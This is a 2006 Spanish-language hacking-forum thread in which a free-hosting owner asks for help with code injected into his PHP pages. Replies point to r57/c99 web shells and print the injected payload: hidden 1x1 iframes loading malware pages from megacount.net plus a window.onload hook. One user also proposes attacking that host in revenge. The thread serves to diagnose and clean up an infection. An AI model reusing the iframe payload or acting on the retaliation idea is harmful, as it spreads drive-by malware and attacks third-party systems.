Normas del foro

Curso Hacker
Bienvenido(a), Visitante. Favor de ingresar o registrarse.
¿Perdiste tu email de activación? - Noviembre 19, 2008, 05:04:24
Inicio Ayuda Ingresar Registrarse
Visita: Articulos - Juegos Gratis - Da Foros

Comunidad Underground Hispana  |  Phreaking, Hacking y Seguridad  |  Bug y Exploits (Moderadores: OzX, y0u-uNsEcUre)  |  Tema: (Ayuda) Mal Exploit en Buena Web 0 Usuarios y 1 Visitante están viendo este tema. « anterior próximo »
Páginas: [1] Ir Abajo Imprimir
Autor Tema: (Ayuda) Mal Exploit en Buena Web  (Leído 596 veces)
dcollymo
Recien Llegado
*
Desconectado Desconectado

Mensajes: 1


Ver Perfil
« en: Octubre 12, 2006, 12:39:04 »
 Hola Muchachos Como Estan, Bueno Tengo una Web De Hosting Gratis ,  y un Gracioso me ha puesto un exploit yo no tengo mucha experiencia en esto, Asi que cualquier ayuda Sera Agradecida y Recompensada. esta es la web
Necesitas ser usuario para ver los enlaces Crear Usuario  Hacer Sesion
www.serverus.org
   Ayuda Huh Porfavor
En línea
ManCuerTex
Visitante
« Respuesta #1 en: Octubre 13, 2006, 04:16:09 »
En línea
arquimedes
Visitante
« Respuesta #2 en: Octubre 13, 2006, 02:47:05 »
weno, mirando la web creo q ya se x dnd van los tiros, por lo q creo te an subido un exploit mediante tu servicio de hosting gratuito.
Si es asi empieza mirando x archivos .php(especialmente aquellos q contengan el nombre r57 o c99) y luego miraria imagenes que no muestren nada(puede que sean codigos php con extenion .gif,jpg...)
En línea
ManCuerTex
Visitante
« Respuesta #3 en: Octubre 14, 2006, 08:39:25 »
En línea
El_Rastro
Miembro
*****
Desconectado Desconectado

Mensajes: 22



Ver Perfil
« Respuesta #4 en: Octubre 15, 2006, 06:50:19 »

   Ellos han eliminado todas las cuentas del host y como quiera l probelma persiste.

   Es un Xploit que porne un iframe en la parte de abajo de todas las webs en .php

  Por ejemplo aqui, tengan cuidado que se pone a descargar un virus (ojo)


Necesitas ser usuario para ver los enlaces Crear Usuario  Hacer Sesion

  Si antes de que termina la carga de la pagina cancelan veran en el codigo fuente un iframe (este):

Código:
<iframe src='http://megacount.net/adv/067/' width=1 height=1></iframe><iframe src='http://megacount.net/adv/067/new.php' width=1 height=1></iframe><iframe src='http://megacount.net/adv/067/new3.php' width=1 height=1></iframe><iframe src='http://megacount.net/adv/new.php?adv=67' width=1 height=1></iframe>
<script language="JavaScript">
<!--
var SymRealOnLoad;
var SymRealOnUnload;

function SymOnUnload()
{
  window.open = SymWinOpen;
  if(SymRealOnUnload != null)
     SymRealOnUnload();
}

function SymOnLoad()
{
  if(SymRealOnLoad != null)
     SymRealOnLoad();
  window.open = SymRealWinOpen;
  SymRealOnUnload = window.onunload;
  window.onunload = SymOnUnload;
}

SymRealOnLoad = window.onload;
window.onload = SymOnLoad;

//-->
</script>

  El cual se mete en todas las paginas .php
« Última modificación: Octubre 15, 2006, 06:52:52 por El_Rastro » En línea
Los conocimientos son totalmente universales y no trates de contenerlos.
Pr0gr4mer
Colaborador
*****
Desconectado Desconectado

Mensajes: 865


Pr0gr4mer al mango


Ver Perfil WWW
« Respuesta #5 en: Octubre 16, 2006, 12:04:30 »
 Bueno como vemos es un verdadero exploit...



 Pero el exploit esta alojado en
Necesitas ser usuario para ver los enlaces Crear Usuario  Hacer Sesion mas precisamente
en
Necesitas ser usuario para ver los enlaces Crear Usuario  Hacer Sesion por lo cual seguramente esta siendo utilizado para muchas web y no solamente para la que plantea el user la cual ya esta infectada. Ahora si nos dirigimos a
Necesitas ser usuario para ver los enlaces Crear Usuario  Hacer Sesion nuestro AV si es bueno! nos detectara 2 virus uno como trojan y el otro como malicioso.

 Entonces si en ves de ingresar directamente al exploit que esta alojado en ese server vamos directamente a
Necesitas ser usuario para ver los enlaces Crear Usuario  Hacer Sesion nos aparecera "Account Suspended" cuya denominacion suspendida es mentira, esa web esta en on como cualquier otra solamente que algun "vivo" la deja como suspendendida.

 Mi Solucion Cheesy : Joder
Necesitas ser usuario para ver los enlaces Crear Usuario  Hacer Sesion
www.megacount.net
y asi terminar de raiz con el problema, solamente  para futuros serves infectados... es decir las que  ya tienen subido el codigo que mostraban pues tendran que hacer limpieza  Grin

 Pr0gr4mer
« Última modificación: Octubre 16, 2006, 12:04:59 por Pr0gr4mer » En línea



 Tu respuesta esta dandole click al
Necesitas ser usuario para ver los enlaces Crear Usuario  Hacer Sesion
San Buscador


 .::Pr0gr4mer::.
El_Rastro
Miembro
*****
Desconectado Desconectado

Mensajes: 22



Ver Perfil
« Respuesta #6 en: Octubre 18, 2006, 07:39:04 »


  Lo que ellos isieron fue mudarse a otro server que no estana infectado  Grin

  Yo ahora le paso mi SSS aver que se puede hacer con esa web XDDD
En línea
Los conocimientos son totalmente universales y no trates de contenerlos.
darthblacky
Visitante
« Respuesta #7 en: Octubre 26, 2006, 04:05:40 »
Código:
Megacount: Account suspended

esa e sla respuesta que recibo, es casualidad o alguien se a cargado ya la pagina? xd
En línea
Páginas: [1] Ir Arriba Imprimir 
Comunidad Underground Hispana  |  Phreaking, Hacking y Seguridad  |  Bug y Exploits (Moderadores: OzX, y0u-uNsEcUre)  |  Tema: (Ayuda) Mal Exploit en Buena Web « anterior próximo »
Ir a:  


Ranking-Hits
Powered by SMF 1.1.7 | SMF © 2006-2007, Simple Machines LLC